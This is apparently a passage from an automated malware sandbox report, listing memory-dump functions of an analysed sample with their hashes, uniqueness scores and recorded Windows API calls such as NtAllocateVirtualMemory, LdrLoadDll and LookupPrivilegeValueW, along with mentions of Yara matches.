                                                          • Opcode Fuzzy Hash: a775f5bdf079abf7afca4dc121936874135f1b0ad8944d1f90cc490e9c453d60
                                                          • Instruction Fuzzy Hash: 5801677160C431DACF24C769D8816BAB3B2FB46394F018E26F196C61DCDB34D555C7A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 292f04462496b38a31f3a626a8acf946737289cdfcfd8a58badd98f19ebe60e2
                                                          • Instruction ID: d39a8952b4b1387ecaef211fe8407eaf6e765b7bbb00919eb1f0ad8db0beb6d4
                                                          • Opcode Fuzzy Hash: 292f04462496b38a31f3a626a8acf946737289cdfcfd8a58badd98f19ebe60e2
                                                          • Instruction Fuzzy Hash: E8A19E31B002199FCB14DFA4E859AAE77B7FF89304F148829E9069B394DB70DD46CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a41ae09225b54c84313cb479c4f881e5d210f914f1c067ad141e62b7674d3a7c
                                                          • Instruction ID: 93089dd34692a862e9706a86d1e621b7e8acc947097f8c8af1f980d5c2909423
                                                          • Opcode Fuzzy Hash: a41ae09225b54c84313cb479c4f881e5d210f914f1c067ad141e62b7674d3a7c
                                                          • Instruction Fuzzy Hash: C851D435B052268FCB14CFB8E88696EB7F6BF86310F198569D405D73A5D730E840CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 63e409a4136ba486a29b292800a1aeb3ecee66a21fe00284fcf647a89f810fcd
                                                          • Instruction ID: 6c2f10934e027c54c2eda31b10bc31d7c659e8802a8339f127e048cbc604fcf8
                                                          • Opcode Fuzzy Hash: 63e409a4136ba486a29b292800a1aeb3ecee66a21fe00284fcf647a89f810fcd
                                                          • Instruction Fuzzy Hash: E4617135B042249FCB14DFA8E859AAD7BB7BF8A711F144469E902AB390CB71DC41CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b4d5ed55b6a222afa2c7da9bf57aa64b5d754658cd1cdc90264893933450a98e
                                                          • Instruction ID: bac548560e3d5401ecc9fd3cf78d950e42fd9b8031ac6b18c6ec74f4f3a67e3f
                                                          • Opcode Fuzzy Hash: b4d5ed55b6a222afa2c7da9bf57aa64b5d754658cd1cdc90264893933450a98e
                                                          • Instruction Fuzzy Hash: 0E711B35A00619DFCB14DFA8C454A9DBBF1FF89314F218559E90AAF3A0DB71AD45CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e7aabc982ba499c9af167be73f2b43a7717a8dfc12ed505d03be4033a6b2c18f
                                                          • Instruction ID: 3a290f0c6301d265ac5e36c385a092a4299bab91a51ed5561a92c27762ebf4fa
                                                          • Opcode Fuzzy Hash: e7aabc982ba499c9af167be73f2b43a7717a8dfc12ed505d03be4033a6b2c18f
                                                          • Instruction Fuzzy Hash: 33517F70B04665CFCB00CB69C995ABDBBB1FF46704F14855AE05A9B2D2E334D881CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6563b78c56d48b542ac83b63c70a6bb3c42a0a4fa32462e7992c36a58f6628b4
                                                          • Instruction ID: 95da1f7ec61e2808104348a001fc16a795d2d8d44be194078742ed9f267b8cd4
                                                          • Opcode Fuzzy Hash: 6563b78c56d48b542ac83b63c70a6bb3c42a0a4fa32462e7992c36a58f6628b4
                                                          • Instruction Fuzzy Hash: 1541C030B102158FCB14DBB9D8589BEBBB6FFC5224B158A29E429DB390DF309C068791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26ed3c36dd61be5d465da9c8f904c58e13504dfe47022f7279965272da1c81d9
                                                          • Instruction ID: e5fdfed1b57aa3cf490adf95bc81262ae06345b8c12e233cc27576005b1bd2e7
                                                          • Opcode Fuzzy Hash: 26ed3c36dd61be5d465da9c8f904c58e13504dfe47022f7279965272da1c81d9
                                                          • Instruction Fuzzy Hash: 85411730A29660CBD701CB68C851B7ABBB1FB4B314F58C5ABE065CB2D2D339D446C352
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6785bcd42e332cac2045a18b116eaadb29f0a1847da5ffa6cf3b19ffd28869e
                                                          • Instruction ID: 5a8e90df4f3154a7aa9fcd0ba189267713b1e7dcbcfc9a11bebc29315eaf46d2
                                                          • Opcode Fuzzy Hash: f6785bcd42e332cac2045a18b116eaadb29f0a1847da5ffa6cf3b19ffd28869e
                                                          • Instruction Fuzzy Hash: 87316F343006098FC700EB69D995E9AB7EAEF85708B158DA9D2468F3B5DB71EC05CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f7428475249f4daa7f8b9d3ba64d07247c70015433e7458511f56265f4de1531
                                                          • Instruction ID: be1630f8d53d47fafe6003d4813e84b6f223c8258a579b3976a3fa256c43a910
                                                          • Opcode Fuzzy Hash: f7428475249f4daa7f8b9d3ba64d07247c70015433e7458511f56265f4de1531
                                                          • Instruction Fuzzy Hash: C9416DB0A05625CBCB10CBA8C9506EAF7F2FF4A310F04856AE05DE73A1D334D894CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d7903a156aba33edc6dc6b80e3c6615b217392419434ce7334917cc492dc158d
                                                          • Instruction ID: 4722cdd5d567a10ed0de3bb88207406afcc93c31f632183239a8eefd1a9b0bb7
                                                          • Opcode Fuzzy Hash: d7903a156aba33edc6dc6b80e3c6615b217392419434ce7334917cc492dc158d
                                                          • Instruction Fuzzy Hash: 5D313C343006098FC710EF69D995D9AB7EAEF85708B158DA9E2068F3B4DB71EC05DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bfa42018af1354d8ca4fe595efa34475f121a0530c93a0579b92eb4c1439f479
                                                          • Instruction ID: 8adef721a3fc6383d50412d32e94be4b5b42924a5dac4bf851904b7ea826ebb7
                                                          • Opcode Fuzzy Hash: bfa42018af1354d8ca4fe595efa34475f121a0530c93a0579b92eb4c1439f479
                                                          • Instruction Fuzzy Hash: 5021F975A043954FCF12DB799C606EB7FB6EFC2110B19496BD495D7281EA309806C361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5f507bba10f116433de46d6e6291ca7d2df8b0e34fd04a6c5b983bf3c706a036
                                                          • Instruction ID: 62a50abcf32cd688b5d3dfdc42dcbc49ab2b60ce2dd36c006a5c061c02da3f04
                                                          • Opcode Fuzzy Hash: 5f507bba10f116433de46d6e6291ca7d2df8b0e34fd04a6c5b983bf3c706a036
                                                          • Instruction Fuzzy Hash: F131AD72A04129CBDF00CFA9C8826BEF7BAFF46300F044967E8559B691C7748944CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5886b74892aabcb5e2e2803f02e85500c9a18d0a105e6080045d200b47214dee
                                                          • Instruction ID: b6b69fd06fe063e66c3ab23c90beaa18bc74338d5511074ef7b36f4a1164a894
                                                          • Opcode Fuzzy Hash: 5886b74892aabcb5e2e2803f02e85500c9a18d0a105e6080045d200b47214dee
                                                          • Instruction Fuzzy Hash: 1121F3357002158FCB10EB78D4189EBBBEAFF85218B45C869D50ACB350EF71E80ACB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false

                                                          Non-executed Functions

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.257266018.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: false

                                                          Executed Functions

                                                          APIs
                                                          • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: A:A
                                                          • API String ID: 2738559852-2859176346
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: dcf73ab426b28c8d3f8806f65fc9a9fc06209ce2fa0aaecf9b931409b7830c57
                                                          • Instruction ID: eef160581ece5b6be39f329254e7ca12e782575019b5e42257213824cc635a55
                                                          • Opcode Fuzzy Hash: dcf73ab426b28c8d3f8806f65fc9a9fc06209ce2fa0aaecf9b931409b7830c57
                                                          • Instruction Fuzzy Hash: 6D90027561100003050AA5D917045070046A7D5391351C025F1006554CD7E188616161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b89eb39028ab5688f1c13e5ebfeed3a169d6bf664db608fb19342296e5f9d237
                                                          • Instruction ID: 1a25c1cd16a0f53fcd72a902df21b4954b81522da5dc6dd3ad8e1f5b08c02d70
                                                          • Opcode Fuzzy Hash: b89eb39028ab5688f1c13e5ebfeed3a169d6bf664db608fb19342296e5f9d237
                                                          • Instruction Fuzzy Hash: A99002B174100442D50561D95614B060005E7E1341F51C019E1055558DC7D9CC527166
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: bd2160619b82b92714bb2e10b999cb03e34529efa7192ef7415b4f0e3fcaed10
                                                          • Instruction ID: 130cf6fc6214e052c402c45bf80025f77f0b1ee50206669c17a22e58264cf936
                                                          • Opcode Fuzzy Hash: bd2160619b82b92714bb2e10b999cb03e34529efa7192ef7415b4f0e3fcaed10
                                                          • Instruction Fuzzy Hash: 739002B160200003450A71D95614616400AA7E0341B51C025E1005594DC6E588917165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a079af71d39ca0d1c7fa066df97dba45dcbd574263a389df9a64a94053acb7ca
                                                          • Instruction ID: 12d67d3d0da063a5779bd8177e8d1d94c4a6225134e3b3ba30625b12f43570b1
                                                          • Opcode Fuzzy Hash: a079af71d39ca0d1c7fa066df97dba45dcbd574263a389df9a64a94053acb7ca
                                                          • Instruction Fuzzy Hash: 6A90027164204152594AB1D956045074006B7E0381791C016A1405954CC6E69856E661
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: c40ff2ce8562ae2d7a663e391c8ba0778b54205705c6d283900e1edfe2a0eb40
                                                          • Instruction ID: bdadd4f54973eeff8de63a5ac9665d15b518fae19f28cb2be87a7c9b53f86656
                                                          • Opcode Fuzzy Hash: c40ff2ce8562ae2d7a663e391c8ba0778b54205705c6d283900e1edfe2a0eb40
                                                          • Instruction Fuzzy Hash: 4290027160100413D51661D957047070009A7D0381F91C416A041555CDD7D68952B161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 78a6abfc8e95a8e96bfac8645358cde481a3ca74c4aea027fa29cfb8d109ac2e
                                                          • Instruction ID: d2d954934aa6753a116697e5796cbca5cb7651a7201f10ca7ca7bd56da468612
                                                          • Opcode Fuzzy Hash: 78a6abfc8e95a8e96bfac8645358cde481a3ca74c4aea027fa29cfb8d109ac2e
                                                          • Instruction Fuzzy Hash: A2900271A0100502D50671D95604616000AA7D0381F91C026A1015559ECBE58992B171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 12c26b61616d292c9640572a4f45e45c60306d9ce40f5c2f4f573c19b6abc390
                                                          • Instruction ID: 325e81858735b0ecf23ace190357220518b4a77dabfe72e4ea435a705170d1d7
                                                          • Opcode Fuzzy Hash: 12c26b61616d292c9640572a4f45e45c60306d9ce40f5c2f4f573c19b6abc390
                                                          • Instruction Fuzzy Hash: 0F90027160100402D50565D966086460005A7E0341F51D015A5015559EC7E588917171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: eb04b1d59912049d0041b43981a53974c69542ae562f15913f7d90426611401c
                                                          • Instruction ID: 2ddf1da5be036aaa7ab78c0894adc860af4ac6471e52a2f9e8fe41a8635ad593
                                                          • Opcode Fuzzy Hash: eb04b1d59912049d0041b43981a53974c69542ae562f15913f7d90426611401c
                                                          • Instruction Fuzzy Hash: 8090027961300002D58571D9660860A0005A7D1342F91D419A000655CCCAD588696361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6b88498f1a6ad8df49e8bd186f8944e2ebe410dbebea146153cb51c9850f1f7a
                                                          • Instruction ID: 99567f19d8ff02331ab08ad1ac29ce06fc1cd0fc7bf732713824fcea3f9ddb8f
                                                          • Opcode Fuzzy Hash: 6b88498f1a6ad8df49e8bd186f8944e2ebe410dbebea146153cb51c9850f1f7a
                                                          • Instruction Fuzzy Hash: E790027170100003D54571D966186064005F7E1341F51D015E0405558CDAD588566262
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 96eab8f2331156addbe6b6a5f6e38e7a7957547c2a10f054a37cbceaf74e250f
                                                          • Instruction ID: f1ad5182df541f9e4de8a74b4f3b0a960598465730aa2632b35eda3e7bc0384e
                                                          • Opcode Fuzzy Hash: 96eab8f2331156addbe6b6a5f6e38e7a7957547c2a10f054a37cbceaf74e250f
                                                          • Instruction Fuzzy Hash: 5790027171114402D51561D996047060005A7D1341F51C415A081555CDC7D588917162
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6312dc9d86751c55430c2eff1505241c6498c6d8b143a8f03d4da1bcc747527a
                                                          • Instruction ID: 237fc09feb6f535907aee1aa9db64dd4a9a3cc92b0d28313b6ee670c61450b88
                                                          • Opcode Fuzzy Hash: 6312dc9d86751c55430c2eff1505241c6498c6d8b143a8f03d4da1bcc747527a
                                                          • Instruction Fuzzy Hash: B990027160140402D50561D95A1470B0005A7D0342F51C015A1155559DC7E5885175B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2f4c3fc75c87b8b2d67dd8291fa5e6d3b515325cc8c2cfed96653a01a7aa56bf
                                                          • Instruction ID: 132870921965155216ed62baad54e00de34344280f271b39aa2e93e3b7663e54
                                                          • Opcode Fuzzy Hash: 2f4c3fc75c87b8b2d67dd8291fa5e6d3b515325cc8c2cfed96653a01a7aa56bf
                                                          • Instruction Fuzzy Hash: E2900271A0100042454571E99A449064005BBE1351751C125A0989554DC6D9886566A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: c509421b81adfde94b524689cee8de9417b4c9d25b269558399c21100d0ae8ac
                                                          • Instruction ID: f687567509220d6472929e8fa923be0f77c1fde09609f50bd035caf3a21340c5
                                                          • Opcode Fuzzy Hash: c509421b81adfde94b524689cee8de9417b4c9d25b269558399c21100d0ae8ac
                                                          • Instruction Fuzzy Hash: 9E90027161180042D60565E95E14B070005A7D0343F51C119A0145558CCAD588616561
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d1da726b3211757d10a6c261e05a6945b3b92d5b0aa76a12ff2cc0c141f55dd2
                                                          • Instruction ID: 7b3aa78926149baec460cf22497976ad43f66a22c1fcca9d860c5295394e9c30
                                                          • Opcode Fuzzy Hash: d1da726b3211757d10a6c261e05a6945b3b92d5b0aa76a12ff2cc0c141f55dd2
                                                          • Instruction Fuzzy Hash: F790027160100802D58571D9560464A0005A7D1341F91C019A0016658DCBD58A5977E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID: F5A
                                                          • API String ID: 1279760036-683449296
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitFreeHeapProcess
                                                          • String ID:
                                                          • API String ID: 1180424539-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Strings
                                                          • The instruction at %p referenced memory at %p., xrefs: 0116B432
                                                          • read from, xrefs: 0116B4AD, 0116B4B2
